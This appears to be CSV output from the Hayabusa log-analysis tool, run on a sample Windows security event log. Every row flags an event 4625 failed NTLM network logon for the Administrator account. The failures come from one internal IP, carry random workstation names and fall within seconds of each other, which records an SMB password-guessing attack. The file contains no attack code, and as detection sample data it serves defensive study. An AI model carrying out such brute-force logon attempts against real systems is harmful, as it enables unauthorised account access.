01:51:21.084 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rEeZEcj63sBddCsK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiATfqYtrH9LoqR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.169 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PG3HB3GqFwQFLdcq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.216 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G8NU6WRdrq9DxM6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cvZKIkI2aeBzbwe0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2EE7AL3nJ7qsnk4Y : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.331 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feu34D0VvoMrnWzo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mrNRIpCpmAV3npax : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zpxgEvvoC0stFdTl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.445 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XvpDKRAPDS36sqNL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.496 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4cqJKEIySxiQdCRD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:21.535 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm1F7QEwBE054ui0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvIjhyfdlXiX72Es : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.622 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dJilW4KgIEeh5VNr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Ka0FYYdVOj90l0L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.715 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B9ZjGE8T6RuGx8SZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nkti4BGVrpoAQRBL : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.804 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fZy2YJPOg1YZ2bd0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rUE6E9H9i0l0P7Jp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.892 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Pkpt2nmRorQ3x0o : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hCZNNzSyi4mLLaxZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:21.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O9ZqF43sDjSirvMK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:22.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XOw9DjHISDX57XUe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rmxFpEQeGsgbXpDy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MfIVCOOWQS7TNKQA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uweLaLhvznDee1IF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oNQcS2BonF12ikiX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.265 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: D43Flf2keSL3aph6 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.307 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zw7nJXNHZ2QNa3In : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UZp4567BIWAwxF9r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: S9iVvPuykq62pV9z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.431 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eRVomETC34InuKPk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VpHfjKgAxChSYz8R : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:22.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tIbTy5IDRy90lbUR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mM6Olq0zYkMlwmrb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.610 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mUehtGEh0EqRHiLP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EhZ2KHmCTonGrXSS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.696 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NZea5qiet7vrT3iv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aNWY8kuJMSy8h0Zk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.781 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bt9DUQ0mwhkJlTt8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zXYtsM2MMuNSYtVr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgzvsdMN2SU7Knlh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:22.971 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DxiBYXNCY32yNb6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.000 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cVfJmOxvsp75g3a0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:23.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uHp1hlHjD8w3WKt3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dEeJWAJgOeueYSM9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tOfPGoUXu932L80d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NbH4R6GK1PIVT3ij : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PgsJokRd07Nh1lO1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 11ylyxQyV5HCJ18g : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.322 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Am2qI1ya4wYdqErV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.374 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5o2AmZsYUYmDpWZE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c0Hd8xWxOxFifJBG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlh64Gtfoig2uzOY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LtK8Hj2kf3dfFSnW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:23.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VKUPqxtNqkVqXgTg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.605 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SKSxp87CBg8L8wSi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CpvxvR0ftQs1gdEF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.684 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U9RGDzNMt9fM6rLF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RvOO9NLhbbKJXQq9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mDB9bIx7LcoJ6IAU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pfJWsGqlQTmFUUPT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.869 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9PRIO3MASsjrdQGs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P9QCn4nZHB0ENeA1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:23.961 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4iUNHB1gE2d1dBfZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tM3IdtrLdVXQjOjB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:24.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dbmn9Er9e1JZZybc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.102 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SY40ARcAoo9cWQIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.139 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Fc7m0blzidQfn1BU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 13SkGPbDDXou7qLA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2YIlJeZpJlvcKgqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.277 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BRhH6atcwLcGmrB4 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BGIInLsy4UCfl0oW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qJ7nEN0u9DkVuVH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:24.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6qb85lEENmrj4ebF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 